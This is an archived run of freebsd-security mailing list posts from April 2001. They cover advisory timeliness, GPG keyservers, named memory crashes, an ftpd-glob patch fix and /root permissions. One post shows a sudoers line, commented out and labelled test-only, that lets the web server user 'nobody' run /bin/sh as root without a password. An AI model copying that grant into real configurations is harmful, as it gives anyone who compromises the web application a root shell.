advisory or will we have to make do? Either way is fine, it's just that the suspence is killing me ;) Roelof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 18:14:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id A460F37B43E for ; Tue, 17 Apr 2001 18:14:25 -0700 (PDT) (envelope-from roelof@nisser.com) Received: from nisser.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id DAA32903; Wed, 18 Apr 2001 03:14:13 +0200 (CEST) (envelope-from roelof@nisser.com) Message-ID: <3ADCEA65.53BF8E3@nisser.com> Date: Wed, 18 Apr 2001 03:14:13 +0200 From: Roelof Osinga Organization: Nisser - Nr. 1 in Veiligheid X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: anderson@centtech.com Cc: lloyd@li5.org, "freebsd-security@freebsd.org" Subject: Re: Add/Remove Users References: <200104171545.f3HFjKq76155@mail.wsufftrust.org.uk> <3ADC56CF.D3498E5@centtech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eric Anderson wrote: > > You should check out the man page for sudo, since you can set the > NOPASSWD option to not ask for passwords.. To smooth things over a demo: #nobody ALL=(root) NOPASSWD: /usr/local/sbin/userdb, /bin/sh, \ # /usr/local/sbin/userdbpw, /usr/local/sbin/makeuserdb # WEBAPP may run VMAIL without password on NISSER hosts WEBAPP NISSER = NOPASSWD:VMAIL The former is explicit whereas the latter depends on having the various aliasses defined. Suffice to say that the VMAIL alias does not include /bin/sh, that was for testing purposes only. Roelof PS these were some intermediairy steps for a webapp that could change a virt.users virt.password, nobody being the user apache runs as. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 18:17:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 4C47837B42C for ; Tue, 17 Apr 2001 18:17:12 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EC12266B38; Tue, 17 Apr 2001 18:17:10 -0700 (PDT) Date: Tue, 17 Apr 2001 18:17:10 -0700 From: Kris Kennaway To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Latency of security notifications Message-ID: <20010417181710.A12757@xor.obsecurity.org> References: <200104171717.AA1124598422@stmail.pace.edu> <20010417150221.B3580@blazingdot.com> <3ADCD543.8AB7B426@ursine.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ibTvN161/egqYuK8" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADCD543.8AB7B426@ursine.com>; from fbsd-secure@ursine.com on Tue, Apr 17, 2001 at 04:44:03PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ibTvN161/egqYuK8 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Apr 17, 2001 at 04:44:03PM -0700, Michael Bryan wrote: > Bottom line, I think a -lot- of people would be happier if the > FreeBSD SAs could go out as soon as possible after a security hole > is disclosed publicly in some other forum, even if all they say is > words to the effect of "Be aware that this security problem exists, > here's a workaround (if any), and we'll be updating this advisory > when official patch information is available." > > That way people can get rapid notification of potential problems > without having to read all of freebsd-security, and instead pick it > up via -announce, presumably with pager notification if they so > desire. Kris, what do you think about this? I think it would result in a flood of support questions about "how do I fix this?"/"What does this mean?" and end up causing the security officer team a lot more work if it came from us, even as some kind of unofficial statement (especially if it was a very brief statement, which it would have to be to get immediately released upon third party disclosure of a vulnerability, because none of us have enough free time to actively pre-empt whatever else we're doing to go and write something comprehensive). Other people usually send copies of third party advisories to this forum for serious issues as soon as they're published (on bugtraq or wherever), and the community takes care of the interim support: that seems like a much better solution to me. > And I realize that part of the delay for the recent advisories > (ntpd, ipfilter, ftpd) was because Kris was out of town for two > weeks. But when I heard that, I was surprised, as I didn't realize > he had no "backup". In the future, I think it would be a good idea > to try and have a second/backup person available who could send out > at least the initial SA if Kris isn't available for that task, if at > all possible. There are a number of others who are part of the security officer team, and in fact the ntpd advisory was written and released by Chris Faulhaber during my absence; it just so happens that we're all going through a busy time right now with our daytime lives and so the latency of released advisories has increased recently. Hopefully that will improve. Kris --ibTvN161/egqYuK8 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63OsWWry0BWjoQKURAgWqAKDLcewNomitLjlV3VvfOVQWBJzsqgCggP15 wuILBPRczbe8g9F4ItrQzQ0= =0KjN -----END PGP SIGNATURE----- --ibTvN161/egqYuK8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 19:15: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id E5C8C37B43C for ; Tue, 17 Apr 2001 19:14:56 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f3I2EsT53132 for ; Tue, 17 Apr 2001 19:14:56 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <3ADCF89E.14CD5D37@ursine.com> Date: Tue, 17 Apr 2001 19:14:54 -0700 From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: Latency of security notifications References: <200104171717.AA1124598422@stmail.pace.edu> <20010417150221.B3580@blazingdot.com> <3ADCD543.8AB7B426@ursine.com> <20010417181710.A12757@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > I think it would result in a flood of support questions about "how do > I fix this?"/"What does this mean?" and end up causing the security > officer team a lot more work if it came from us, even as some kind of > unofficial statement (especially if it was a very brief statement, > which it would have to be to get immediately released upon third party > disclosure of a vulnerability, because none of us have enough free > time to actively pre-empt whatever else we're doing to go and write > something comprehensive). > > Other people usually send copies of third party advisories to this > forum for serious issues as soon as they're published (on bugtraq or > wherever), and the community takes care of the interim support: that > seems like a much better solution to me. Except that there are definitely cases where that isn't adequate, judging from current and past complaints. Although I pick up the info from freebsd-security (and in a couple of cases was the person to forward it there in the first place), a lot of people just don't have the time to keep up with the discussion list, but would definitely keep up with the moderated announcement list. Even to the point of having that list forwarded to a pager for the fastest possible notification, which I think is an excellent idea. Nobody in their right mind would forward freebsd-security into a pager. At least not for very long. ;-) I understand your concern about the flood of questions, but that already happens anyway, at least within the freebsd-security list. Maybe such a mini "early alert" advisory to freebsd-security-announce could be worded in such a way that it would encourage people to check out the unmoderated list for rapid on-the-fly support questions, until such time as an official advisory came out? Something like this (very rough cut): The FreeBSD security team has been notified of a problem with XYZ. An official security announcement will be forthcoming shortly with the recommended fixes. In the meantime, please subscribe to and read the freebsd-security mailing list for the latest news on this issue. And then list the minimal information that can be included, such as the impact, the affected versions and any potential workarounds (to the best that they are understood at the time). This would -hopefully- minimize any questions sent directly to the security team, with most of the traffic going to freebsd-security. (Which already happens anyway, so it shouldn't be a significant increase in volume.) I really hope you seriously consider doing something like this. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 19:46:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id EB2C037B43F for ; Tue, 17 Apr 2001 19:46:07 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f3I2jtT17721; Wed, 18 Apr 2001 12:45:57 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104180245.f3I2jtT17721@drugs.dv.isc.org> To: Michael Bryan Cc: freebsd-security@freebsd.org From: Mark.Andrews@nominum.com Subject: Re: Latency of security notifications In-reply-to: Your message of "Tue, 17 Apr 2001 19:14:54 MST." <3ADCF89E.14CD5D37@ursine.com> Date: Wed, 18 Apr 2001 12:45:54 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The FreeBSD security team has been notified of a problem > with XYZ. An official security announcement will be forthcoming > shortly with the recommended fixes. In the meantime, please > subscribe to and read the freebsd-security mailing list for the > latest news on this issue. This approach doesn't work. I was not on the freebsd-security list when the ntpd bugtraq message went out. I found it impossible to see the *recent* traffic on the list that I had missed. This is not to say that it can't be made to work. Just that we are not at a stage were this is the correct response. Mark -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 21:21: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 86F3C37B422 for ; Tue, 17 Apr 2001 21:21:02 -0700 (PDT) (envelope-from dlacroix@cowpie.acm.vt.edu) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.11.3/8.11.3) id f3I4KQW98885; Wed, 18 Apr 2001 00:20:26 -0400 (EDT) (envelope-from dlacroix) From: David La Croix Message-Id: <200104180420.f3I4KQW98885@cowpie.acm.vt.edu> Subject: Re: Latency of security notifications To: kris@obsecurity.org (Kris Kennaway) Date: Tue, 17 Apr 2001 23:20:26 -0500 (CDT) Cc: freebsd-security@freebsd.org In-Reply-To: <20010417181710.A12757@xor.obsecurity.org> from "Kris Kennaway" at Apr 17, 2001 06:17:10 PM X-Mailer: ELM [version 2.5 PL5] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On the topic of "early notification" how about adding a custom header (which any user active on the list and/or had read the appropriate guidelines on posting could add on any appropriate "early-warning" alert type messages/SAs) The custom header could be checked for by the mail filter, and used to separate out the announcements from the discussion. I am not an expert on Majordomo, (or other list managment services), so I'm not sure if it's possible to stick an X-Freebsd-security: Alert header in there and have Majordomo send it on, but I think that might be the magic to help those who don't have time to filter through the messages, and don't want to miss an important advisory/warning. Perhaps only a Security officer might have access to post with the new headers. (I haven't spent that much time thinking about it ... I'm on vacation. :) Another thought might be to setup a second moderated mailing list -- which sets the reply-to address to be the normal list and shares the same subscription list as freebsd-security. (then people could forward mails based on the addressee to their pagers/phones/911 mail folder. We could also have suggested usage for the "importance/priority" (sorry, can't think which it is) heading to bring into play when someone posts a broad warning such as "NTP has a buffer overflow exploit". On Tue, Apr 17, 2001 at 04:44:03PM -0700, Michael Bryan wrote: > > > Bottom line, I think a -lot- of people would be happier if the > > FreeBSD SAs could go out as soon as possible after a security hole > > is disclosed publicly in some other forum, even if all they say is > > words to the effect of "Be aware that this security problem exists, > > here's a workaround (if any), and we'll be updating this advisory > > when official patch information is available." > > > > That way people can get rapid notification of potential problems > > without having to read all of freebsd-security, and instead pick it > > up via -announce, presumably with pager notification if they so > > desire. Kris, what do you think about this? > > I think it would result in a flood of support questions about "how do > I fix this?"/"What does this mean?" and end up causing the security > officer team a lot more work if it came from us, even as some kind of > unofficial statement (especially if it was a very brief statement, > which it would have to be to get immediately released upon third party > disclosure of a vulnerability, because none of us have enough free > time to actively pre-empt whatever else we're doing to go and write > something comprehensive). > > Other people usually send copies of third party advisories to this > forum for serious issues as soon as they're published (on bugtraq or > wherever), and the community takes care of the interim support: that > seems like a much better solution to me. > > > And I realize that part of the delay for the recent advisories > > (ntpd, ipfilter, ftpd) was because Kris was out of town for two > > weeks. But when I heard that, I was surprised, as I didn't realize > > he had no "backup". In the future, I think it would be a good idea > > to try and have a second/backup person available who could send out > > at least the initial SA if Kris isn't available for that task, if at > > all possible. > > There are a number of others who are part of the security officer > team, and in fact the ntpd advisory was written and released by Chris > Faulhaber during my absence; it just so happens that we're all going > through a busy time right now with our daytime lives and so the > latency of released advisories has increased recently. Hopefully that > will improve. > > Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 23:27:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id C594737B423 for ; Tue, 17 Apr 2001 23:27:12 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from sentry.granch.com (localhost [127.0.0.1]) by sentry.granch.com (8.11.3/8.11.3) with SMTP id f3I6Q1203110; Wed, 18 Apr 2001 13:26:02 +0700 (NOVST) (envelope-from shelton@sentry.granch.ru) Content-Type: text/plain; charset="koi8-r" From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. To: Pete Fritchman , James Greenfield Subject: Re: GPG and "Not enough random bytes available" Date: Wed, 18 Apr 2001 13:26:01 +0700 X-Mailer: KMail [version 1.2] Cc: freebsd-security@FreeBSD.ORG References: <026a01c0c780$e4ab3260$4501a8c0@boubou> <20010417170303.D17908@databits.net> In-Reply-To: <20010417170303.D17908@databits.net> MIME-Version: 1.0 Message-Id: <01041813260105.00414@sentry.granch.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wednesday 18 April 2001 04:03, Pete Fritchman wrote: > ++ 17/04/01 22:56 +0200 - James Greenfield: > | Any attempt to generate a keypair results in a message to the effect of > | "Not enough random bytes available". > You can also crazy press any keys on your keyboard and pull your mouse by her tail :-) until key'll generated. -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton Granch Ltd. system administrator, e-mail: achilov@granch.ru PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 23:30: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id F067737B422 for ; Tue, 17 Apr 2001 23:30:03 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from sentry.granch.com (localhost [127.0.0.1]) by sentry.granch.com (8.11.3/8.11.3) with SMTP id f3I6Tt203124 for ; Wed, 18 Apr 2001 13:29:55 +0700 (NOVST) (envelope-from shelton@sentry.granch.ru) Content-Type: text/plain; charset="koi8-r" From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. To: freebsd-security@freebsd.org Subject: PGP public keys Date: Wed, 18 Apr 2001 13:29:55 +0700 X-Mailer: KMail [version 1.2] MIME-Version: 1.0 Message-Id: <01041813295506.00414@sentry.granch.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have just installed GPG. As mirrored in doc, I put my public key on my web page (rest is under construction :-)) ). But where can I find public keys for people? Is there any keyserver? -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton Granch Ltd. system administrator, e-mail: achilov@granch.ru PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 23:36:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 5699337B422 for ; Tue, 17 Apr 2001 23:36:51 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f3I6aQv04468; Tue, 17 Apr 2001 23:36:26 -0700 Date: Tue, 17 Apr 2001 23:36:26 -0700 From: Brooks Davis To: achilov@granch.ru Cc: freebsd-security@FreeBSD.ORG Subject: Re: PGP public keys Message-ID: <20010417233626.A3839@Odin.AC.HMC.Edu> References: <01041813295506.00414@sentry.granch.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="bp/iNruPH9dso1Pn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01041813295506.00414@sentry.granch.com>; from shelton@sentry.granch.ru on Wed, Apr 18, 2001 at 01:29:55PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --bp/iNruPH9dso1Pn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Apr 18, 2001 at 01:29:55PM +0700, Rashid N. Achilov wrote: > I have just installed GPG. As mirrored in doc, I put my public key on my = web=20 > page (rest is under construction :-)) ). But where can I find public keys= for=20 > people? Is there any keyserver? pgp.mit.edu is a good one. You should submit your key there. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --bp/iNruPH9dso1Pn Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE63TXqXY6L6fI4GtQRAjg6AKCOV3s0c1LZOgudhSl0nkHcu7FSEACeLXBl xFxqNhwmUqNaPP3bBfafxb0= =xKNV -----END PGP SIGNATURE----- --bp/iNruPH9dso1Pn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 23:40:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from casimir.physics.purdue.edu (casimir.physics.purdue.edu [128.210.146.111]) by hub.freebsd.org (Postfix) with ESMTP id 3555337B423 for ; Tue, 17 Apr 2001 23:40:39 -0700 (PDT) (envelope-from will@physics.purdue.edu) Received: by casimir.physics.purdue.edu (Postfix, from userid 1000) id 06A011BD72; Wed, 18 Apr 2001 01:38:22 -0500 (EST) Date: Wed, 18 Apr 2001 01:38:22 -0500 From: Will Andrews To: achilov@granch.ru Cc: freebsd-security@FreeBSD.ORG Subject: Re: PGP public keys Message-ID: <20010418013822.Y5017@casimir.physics.purdue.edu> Reply-To: Will Andrews References: <01041813295506.00414@sentry.granch.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="H5pgEA8DvTwLpheO" Content-Disposition: inline User-Agent: Mutt/1.3.15i In-Reply-To: <01041813295506.00414@sentry.granch.com>; from shelton@sentry.granch.ru on Wed, Apr 18, 2001 at 01:29:55PM +0700 X-Operating-System: Linux 2.2.18 sparc64 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --H5pgEA8DvTwLpheO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Apr 18, 2001 at 01:29:55PM +0700, Rashid N. Achilov wrote: > I have just installed GPG. As mirrored in doc, I put my public key on my = web=20 > page (rest is under construction :-)) ). But where can I find public keys= for=20 > people? Is there any keyserver? Yes. gpg --keyserver pgp.mit.edu --send-keys yourkeyidhere to send your key. Check out http://pgp.mit.edu/ to search for other keys. Also check out http://people.freebsd.org/~wollman/freebsd.keyring for developers' keyrings. I wrote a script that updates all your public keys off pgp.mit.edu here: http://www.physics.purdue.edu/~will/update_keys. Note: this script only works with GnuPG. Enjoy, --=20 wca --H5pgEA8DvTwLpheO Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE63TZeF47idPgWcsURAgP0AJ9d85otIiEbM2/WIc3sWvnORgyxDQCfQAUr JzwyXZY7m84bbmr39jymKNk= =SFzD -----END PGP SIGNATURE----- --H5pgEA8DvTwLpheO-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 23:44: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from isua2.iastate.edu (isua2.iastate.edu [129.186.1.202]) by hub.freebsd.org (Postfix) with ESMTP id C813737B424 for ; Tue, 17 Apr 2001 23:44:04 -0700 (PDT) (envelope-from landon@iastate.edu) Received: from localhost (landon@localhost) by isua2.iastate.edu (8.8.8/8.8.5) with SMTP id BAA12359; Wed, 18 Apr 2001 01:43:54 -0500 (CDT) Date: Wed, 18 Apr 2001 01:43:54 -0500 (CDT) From: "Landon C. Evans" To: "Rashid N. Achilov" Cc: freebsd-security@FreeBSD.ORG Subject: Re: PGP public keys In-Reply-To: <01041813295506.00414@sentry.granch.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There is good documentation at www.gnupg.org for sending your key off to one of the many keyservers. mit has one I believe and certserver.pgp.com is one I use. Landon Evans On Wed, 18 Apr 2001, Rashid N. Achilov wrote: > I have just installed GPG. As mirrored in doc, I put my public key on my web > page (rest is under construction :-)) ). But where can I find public keys for > people? Is there any keyserver? > -- > With Best Regards. > Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton > Granch Ltd. system administrator, e-mail: achilov@granch.ru > PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 1:13: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id 2313537B422 for ; Wed, 18 Apr 2001 01:12:58 -0700 (PDT) (envelope-from info@emre.de) Received: from sys-125.emre.de (sys-125.netcologne.de [194.8.193.125]) by mr200.netcologne.de (Mirapoint) with ESMTP id ADY31662; Wed, 18 Apr 2001 10:12:57 +0200 (CEST) Message-Id: <5.0.0.25.1.20010418101726.00a22eb0@mail.netcologne.de> X-Sender: nc-bastuzem@mail.netcologne.de X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 18 Apr 2001 10:17:53 +0200 To: freebsd-security@FreeBSD.ORG From: Emre Bastuz Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 350c2c4e subscribe freebsd-security info@emre.de -- Emre Bastuz info@emre.de http://emre.de UIN: 561260 PGP Key ID: 0xEA0E2CA1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 3:55: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id 08EDE37B422 for ; Wed, 18 Apr 2001 03:55:06 -0700 (PDT) (envelope-from michael@fastmail.ca) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 486922326; Wed, 18 Apr 2001 06:55:02 -0400 (EDT) MIME-Version: 1.0 Message-Id: <3ADD7286.00003D.39304@frodo.searchcanada.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_QBIZSPG00M3NTT4D7TH0" To: freebsd-security@freebsd.org Subject: Odd Machine Crashes From: "Michael Richards" X-Fastmail-IP: 24.43.130.237 Date: Wed, 18 Apr 2001 06:55:02 -0400 (EDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------Boundary-00=_QBIZSPG00M3NTT4D7TH0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit Hi. I'm trying to figure out why my machine is crapping out every night. There are some odd messages coming from named and the machine is obviously running out of memory. Here is one of the named messages. I'm not 100% confident that this is my problem but it seems odd: Apr 18 06:20:10 frodo named[43474]: ns_resp: TCP truncated: "29.115.254.207.in-addr.arpa" IN PTR from [207.254.115.2].53 Name: webterminator1.crystaltech.com Address: 207.254.115.2 Hrm... Odd name for a machine. I had problems with a perl script going wild and eating my 1Gb of memory and swap but I've limited its resources after overcoming a nasty error. It turns out if you have a space at the end of a line in login.conf it will silently ignore the rest of the restrictions in your class! Apr 17 22:03:14 frodo /kernel: pid 2192 (named), uid 0, was killed: out of swap space I don't believe there is a problem with the version of named... named 8.2.3-REL Sun Feb 18 11:47:44 EST 2001 I've since started limiting the resources of class daemon and running named under that user. I'm not sure if this is correct or if FreeBSD will even respect the class when a daemon is started as root. bash-2.03# limits -C daemon Resource limits for class daemon: cputime infinity secs filesize infinity kb datasize infinity kb stacksize infinity kb coredumpsize infinity kb memoryuse 131072 kb memorylocked infinity kb maxprocesses 64 openfiles 1024 sbsize infinity bytes If for some reason named goes bezerk this I believe should limit it to 128m of memory. I also tried limiting user http with the following class: Resource limits for class http: cputime infinity secs filesize 819200 kb datasize 65536 kb stacksize 32768 kb coredumpsize 8192 kb memoryuse 131072 kb memorylocked 23552 kb maxprocesses 128 openfiles 1024 sbsize infinity bytes I did this in case a bug in a CGI is causing problems. Unfortunately nothing seems to respect this limit. Since these crashes seem to be happening in the middle of the night I can't seem to catch the program that's eating the memory. Any ideas? -Michael _________________________________________________________________ http://fastmail.ca/ - Fast Free Web Email for Canadians --------------Boundary-00=_QBIZSPG00M3NTT4D7TH0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 5: 7:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id EB09F37B422; Wed, 18 Apr 2001 05:07:16 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id JAA64497; Wed, 18 Apr 2001 09:09:41 -0300 (ART) From: Fernando Schapachnik Message-Id: <200104181209.JAA64497@ns1.via-net-works.net.ar> Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) In-Reply-To: <20010417171445.B4890@peitho.fxp.org> "from Chris Faulhaber at Apr 17, 2001 05:14:45 pm" To: Chris Faulhaber Date: Wed, 18 Apr 2001 09:09:41 -0300 (ART) Cc: Fernando Schapachnik , security@freebsd.org, stable@freebsd.org Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Chris Faulhaber escribió: > > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined? > > > > The advisory patch is missing the glob.h patch along with the > instruction to copy the resulting glob.h to /usr/include. > > Quick fix is to either get the diff or entire file from > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h, > copy the resulting file to /usr/include and build. Obviously, it worked. Thanks! Fernando P. Schapachnik Planificación de red y tecnología VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 7:35: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from icon.bg (icon.bg [62.176.80.58]) by hub.freebsd.org (Postfix) with SMTP id EFE0437B424 for ; Wed, 18 Apr 2001 07:34:52 -0700 (PDT) (envelope-from v0rbiz@icon.bg) Received: (qmail 64677 invoked by uid 1144); 18 Apr 2001 14:39:27 -0000 Date: Wed, 18 Apr 2001 17:39:27 +0300 From: Victor Ivanov To: freebsd-security@freebsd.org Subject: /root and users home dir permissions Message-ID: <20010418173927.A64529@icon.icon.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --DocE+STaALJfprDB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi all, I noticed /root is installed with mode=3D0755 (and updated every time by installworld). It's the root home directory... some admins (like me) are using it for keeping sensitive data away from regular users. Shouldn't it be mode=3D0700 in /etc/mtree/BSD.root.dist? Also, when adding new users their home directories 